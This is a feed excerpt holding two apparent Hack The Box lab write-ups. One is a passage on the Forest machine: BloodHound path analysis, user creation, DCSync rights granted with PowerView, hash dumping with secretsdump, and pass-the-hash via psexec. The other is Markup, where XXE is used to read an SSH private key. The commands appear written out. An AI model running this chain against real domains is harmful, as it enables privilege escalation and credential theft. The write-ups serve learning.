&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fxh5w1ksu0ef7sdlx7220.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fxh5w1ksu0ef7sdlx7220.png" alt=" " width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This was the point where I really started to appreciate how useful BloodHound is. Being able to visualize and analyze the relationships between users, groups, computers, and permissions within an Active Directory environment made it much easier to understand how everything was connected.&lt;/p&gt;

&lt;p&gt;Instead of manually going through all the information we collected, we could use BloodHound to identify interesting relationships and potential attack paths that could eventually lead to higher-privileged accounts or groups.&lt;/p&gt;

&lt;p&gt;I immediately went to Explore → Cypher → Saved Queries and selected “Shortest Paths to Domain Admins” to see if there were any potential attack paths that could lead to the Domain Admins group.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fnaqi9yj9pp4cq4a188q2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fnaqi9yj9pp4cq4a188q2.png" alt=" " width="799" height="653"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If we take a look at this portion of the BloodHound graph, we can see that the Exchange Windows Permissions group has WriteDACL permission over the htb.local domain.&lt;/p&gt;

&lt;p&gt;In simple terms, WriteDACL means that members of this group have permission to modify the access control list (DACL) of the domain object. This is interesting because being able to modify the DACL can potentially allow us to grant additional permissions to a user or group, which could then be used to escalate our privileges within the domain.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fugj990ri556xs2rgusxf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fugj990ri556xs2rgusxf.png" alt=" " width="800" height="343"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Frzm3yek19je78fkz1hg7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Frzm3yek19je78fkz1hg7.png" alt=" " width="800" height="549"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now I wanted to find out who has inbound control over the Exchange Windows Permissions group.&lt;/p&gt;

&lt;p&gt;This is because inbound control in BloodHound shows us which users or groups have permissions over the selected object. In this case, I wanted to identify accounts that have some level of control over the Exchange Windows Permissions group, such as the ability to modify its membership or permissions.&lt;/p&gt;

&lt;p&gt;For mental model:&lt;br&gt;
Inbound control -&amp;gt; "Who can control this object?"&lt;br&gt;
Outbound control -&amp;gt; "What objects can this object control?"&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fak9gtuujsndvtedqseok.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fak9gtuujsndvtedqseok.png" alt=" " width="800" height="715"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After inspecting the Inbound Control relationship graph, I noticed something that finally clicked.&lt;/p&gt;

&lt;p&gt;We can see that the compromised svc-alfresco account is a member of the Service Account Group, which is itself a member of the Privileged IT Account Group. That group is then a member of the Account Operators group.&lt;/p&gt;

&lt;p&gt;More importantly, the Account Operators group has GenericAll permission over the Exchange Windows Permissions group.&lt;/p&gt;

&lt;p&gt;This means that svc-alfresco can exercise the GenericAll rights that Account Operators has over the Exchange Windows Permissions group&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhcassdyw8dcqb6qeyban.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhcassdyw8dcqb6qeyban.png" alt=" " width="800" height="222"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So what can Account Operators can do?&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F67z954kfe82fomvlhi8p.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F67z954kfe82fomvlhi8p.png" alt=" " width="800" height="563"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And what can Exchange Windows Permissions can do?&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fnclej8pkwqrijtnfcdo9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fnclej8pkwqrijtnfcdo9.png" alt=" " width="800" height="563"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Hence:&lt;br&gt;
Account Operators membership → gives svc-alfresco the ability to perform certain account-management operations, such as creating users.&lt;/p&gt;

&lt;p&gt;GenericAll over Exchange Windows Permissions → gives svc-alfresco extensive control over that group object, including the ability to modify its membership.&lt;/p&gt;

&lt;p&gt;At this point, I had a pretty good idea of what the attack chain would look like.&lt;/p&gt;

&lt;p&gt;My plan was to first create a new user and add that user to the Exchange Windows Permissions group. Earlier, we found that this group has WriteDACL permission over the htb.local domain object. This means that once our new user is a member of the group, we can potentially modify the domain object’s DACL and grant the user the directory replication permissions required to perform DCSync.&lt;/p&gt;

&lt;p&gt;Once the user has the necessary replication rights, we can use impacket-secretsdump to perform a DCSync attack and retrieve password hashes for domain accounts, including the Domain Administrator account.&lt;/p&gt;

&lt;p&gt;That would be the final goal of this attack chain.&lt;/p&gt;

&lt;p&gt;I first created a new user: &lt;code&gt;net user {name} {password} /add /domain&lt;/code&gt;&lt;br&gt;
Username: newuser &lt;br&gt;
Password: iamgroot6767&lt;/p&gt;

&lt;p&gt;and added this user into the Exchange Windows Permission Group&lt;br&gt;
&lt;code&gt;net group "Exchange Windows Permissions" {name} /add /domain&lt;/code&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ff5ym67tf7ggtguyd2ngh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ff5ym67tf7ggtguyd2ngh.png" alt=" " width="800" height="166"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I then tried to grant DCSync rights to the newly created user using the following command, which I got from ChatGPT:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity "newuser" -Rights DCSync&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;However, I got an error saying:&lt;/p&gt;

&lt;p&gt;"Get-ObjectAcl is not recognized as the name of a cmdlet"&lt;/p&gt;

&lt;p&gt;At first, I had no idea what this meant, so I went to Google to figure out what was going on. Eventually, I found out that Add-DomainObjectAcl is a function from PowerView, which meant that PowerView needed to be loaded into my PowerShell session before I could use the command.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fvqsim8peb8vt85l6l44t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fvqsim8peb8vt85l6l44t.png" alt=" " width="800" height="369"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Googled PowerView.ps1 download and managed to find the github repo for it&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fb9h9zh36t494n520jwel.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fb9h9zh36t494n520jwel.png" alt=" " width="799" height="355"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fpqf8heof7xwtff0dcd6g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fpqf8heof7xwtff0dcd6g.png" alt=" " width="800" height="436"&gt;&lt;/a&gt;&lt;br&gt;
github repo link: &lt;a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1" rel="noopener noreferrer"&gt;https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After downloading the PowerView.ps1, I transferred it to the svc-alfresco machine via the same way I did for the SharpHound.exe&lt;/p&gt;

&lt;p&gt;Run the PowerView.ps1 by -&amp;gt; &lt;code&gt;. .\PowerView.ps1&lt;/code&gt; (Apparently this is the way to run the file)&lt;/p&gt;

&lt;p&gt;And heres the part that I was stuck for really long. I faced an issue where even though the command for giving DCSync right to newuser didn't throw the error, it didn't actually give DCSync right to newuser&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ff82laiub5g53duxbkluj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ff82laiub5g53duxbkluj.png" alt=" " width="799" height="275"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To verify whether the DCSync permissions had been successfully granted, I ran the following command:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;Get-DomainObjectAcl -Identity "DC=htb,DC=local" -ResolveGUIDs | Where-Object {$_.ObjectAceType -match "Replication"} | Select-Object SecurityIdentifier,ObjectAceType,ActiveDirectoryRights&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;This command queries the ACL of the htb.local domain object and filters the results for replication-related permissions. It then displays the Security Identifier (SID), the type of replication permission, and the associated Active Directory rights.&lt;/p&gt;

&lt;p&gt;I expected to see the SID belonging to newuser, which ends in 10101, but it wasn’t anywhere in the output. This suggested that the DCSync permissions had not been applied successfully, so I needed to figure out what went wrong.&lt;/p&gt;

&lt;p&gt;However, I couldn’t figure out why it wasn’t working. No matter what I tried, the SID of newuser still wasn’t showing up in the replication-related ACLs, so I eventually had no choice but to refer to the official HTB write-up.&lt;/p&gt;

&lt;p&gt;From the write-up, I found that the important part was to perform the ACL modification using the credentials of the newly created user.&lt;/p&gt;

&lt;p&gt;So what was actually happening?&lt;br&gt;
When I ran the command without -Credential, PowerView was likely performing the LDAP operation using the credentials of my current session, which was svc-alfresco.&lt;/p&gt;

&lt;p&gt;The problem was that svc-alfresco was not a member of the Exchange Windows Permissions group. It was newuser that I had created and added to the group, meaning that newuser was the account that inherited the WriteDACL permission.&lt;/p&gt;

&lt;p&gt;This made me realise that the key point was &lt;strong&gt;which account was actually performing the ACL modification.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I needed the newly created newuser account to perform the ACL modification, rather than svc-alfresco. That’s why there was a need to create PSCredential object containing newuser’s credentials and passed it to Add-ObjectACL using the -Credential parameter.&lt;/p&gt;

&lt;p&gt;This tells PowerView to perform the LDAP operation using newuser’s credentials, allowing the operation to make use of the WriteDACL permission that newuser inherited through its membership in the Exchange Windows Permissions group.&lt;/p&gt;

&lt;p&gt;First, convert the plaintext password of newuser into a SecureString:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;$pass = ConvertTo-SecureString 'iamgroot6767' -AsPlainText -Force&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Next, create a PowerShell credential object using the username and the SecureString password:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;$cred = New-Object System.Management.Automation.PSCredential('htb\newuser', $pass)&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Finally, run the ACL modification command again, this time supplying the credential object:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;Add-ObjectACL -PrincipalIdentity newuser -Credential $cred -Rights DCSync&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;This time, the command successfully granted the DCSync permissions to newuser. This was a very good lesson learnt&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fs8sn9xrohmcgtfw1asaz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fs8sn9xrohmcgtfw1asaz.png" alt=" " width="800" height="286"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Since newuser now has the necessary DCSync/replication rights, we can use impacket-secretsdump with the newuser account to perform a DCSync attack.&lt;/p&gt;

&lt;p&gt;This allows us to request credential information from Active Directory through the directory replication process, including password hashes for domain accounts.&lt;/p&gt;

&lt;p&gt;Command:&lt;br&gt;
&lt;code&gt;impacket-secretsdump htb/newuser:'iamgroot6767'@10.129.90.30&lt;/code&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fjmv4003wly1yyufa46hx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fjmv4003wly1yyufa46hx.png" alt=" " width="800" height="249"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;From the output, secretsdump dumped credential information for the domain accounts that our DCSync permissions allowed us to retrieve, and we finally obtained the Domain Administrator’s NTLM hash.&lt;/p&gt;

&lt;p&gt;Since we now have the NTLM hash, we don’t actually need to crack the password. We can use a Pass-the-Hash (PtH) attack to authenticate as the Administrator account by supplying the hash directly to impacket-psexec.&lt;/p&gt;

&lt;p&gt;The command used:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;impacket-psexec Administrator@10.129.90.30 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;After successfully authenticating as Administrator, I navigated to the Administrator’s Desktop and retrieved the root flag, completing the machine.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F1lqevuir6qkqw3rgdfbf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F1lqevuir6qkqw3rgdfbf.png" alt=" " width="800" height="406"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>infosec</category>
      <category>learning</category>
      <category>security</category>
    </item>
    <item>
      <title>HTB - Markup</title>
      <dc:creator>Jung</dc:creator>
      <pubDate>Wed, 16 Sep 2026 09:42:24 +0000</pubDate>
      <link>https://dev.to/zkrnvkf/htb-markup-5cje</link>
      <guid>https://dev.to/zkrnvkf/htb-markup-5cje</guid>
      <description>&lt;p&gt;OS: Windows&lt;br&gt;
Difficulty: Very Easy&lt;/p&gt;

&lt;p&gt;After the nmap enumeration:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;Nmap scan report for 10.129.129.117
Host is up (0.26s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA)
|   256 90:7d:96:a9:6e:9e:4d:40:94:e7:bb:55:eb:b3:0b:97 (ECDSA)
|_  256 f9:10:eb:76:d4:6d:4f:3e:17:f3:93:d6:0b:8c:4b:81 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
|_http-title: MegaShopping
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
443/tcp open  ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_http-title: MegaShopping

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.66 seconds
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We know that:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Port 22 (SSH) is opened so we could probably ssh into target machine later &lt;/li&gt;
&lt;li&gt;Port 80 (HTTP) suggests that target machine hosts a web server that we could go look into&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Upon visiting the website, we are greeted with Login Page&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F5kc0lqbcs4kvmzhd8pnx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F5kc0lqbcs4kvmzhd8pnx.png" alt=" " width="800" height="498"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After trying several default credentials, we would be able to login using &lt;strong&gt;admin:password&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;After logging in and interacting with the websites, we realise that only the user inputs in &lt;strong&gt;orders&lt;/strong&gt; page is handled by server as we could see from the POST request caught in the Burp Suite&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F67d7e0gvlgtxppk4nft0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F67d7e0gvlgtxppk4nft0.png" alt=" " width="799" height="353"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here I got to learn about XXE (XML External Entity) which is a vulnerability that occurs when an application processes XML input and allows the XML parser to resolve external entities controlled by the attacker&lt;/p&gt;

&lt;p&gt;If we google XXE attack and refer to the official PortSwigger page, it shows how we can exploit as shown in the image below&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8sx15bu0koe19npc8hpd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8sx15bu0koe19npc8hpd.png" alt=" " width="800" height="250"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;First, we need to verify whether the application is vulnerable to XXE and whether we can successfully exploit it. A common XXE proof of concept uses /etc/passwd to read a local file on Linux systems. However, since our target machine is running Windows, /etc/passwd does not exist. Instead, we can target C:\Windows\win.ini, a standard configuration file that is commonly present on Windows systems.&lt;/p&gt;

&lt;p&gt;By attempting to read this file through the XXE payload, we can determine whether the XML parser is resolving external entities and allowing us to access local files. As shown in the image below, the contents of win.ini are returned in the server’s response, confirming that the application is vulnerable to XXE-based local file disclosure.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Faesj4hia28eypkb3ar6n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Faesj4hia28eypkb3ar6n.png" alt=" " width="799" height="312"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Furthermore, after we inspect the HTML code of the Orders page, we also identify that user called &lt;strong&gt;Daniel&lt;/strong&gt; exists in the target machine&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fqz7028a9mnrp4qfsqhh0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fqz7028a9mnrp4qfsqhh0.png" alt=" " width="800" height="813"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So we know:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;User called Daniel exists&lt;/li&gt;
&lt;li&gt;Port 22 is opened&lt;/li&gt;
&lt;li&gt;We can try to access a file in the server via XXE payload&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The next attack chain we could explore is looking for a password or private key belonging to Daniel that could allow us to authenticate to the target machine via SSH as Daniel.&lt;/p&gt;

&lt;p&gt;At this point, I had to rely on ChatGPT because I wasn’t familiar with the common directory where SSH private keys are typically stored on Windows. I learned that OpenSSH commonly stores user SSH keys under the .ssh directory and commonly name the private key file as id_rsa, so I tried the following path: &lt;code&gt;C:\Users\daniel\.ssh\id_rsa&lt;/code&gt; and it worked&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6iqu8j4563bc3mis02xq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6iqu8j4563bc3mis02xq.png" alt=" " width="799" height="539"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fvc8d96x7u72gn4mkr83f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fvc8d96x7u72gn4mkr83f.png" alt=" " width="800" height="813"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Save the private key into a file in kali machine and ssh into the target host as user daniel via `ssh -i {private key file} daniel@{ip address}&lt;/p&gt;

&lt;p&gt;Navigate to the daniel's Desktop to find the &lt;strong&gt;user flag&lt;/strong&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F3lu5a1b9dy7v2w3zkauv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F3lu5a1b9dy7v2w3zkauv.png" alt=" " width="800" height="255"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fh468kp4io8xb8jhk3ev8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fh468kp4io8xb8jhk3ev8.png" alt=" " width="799" height="570"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
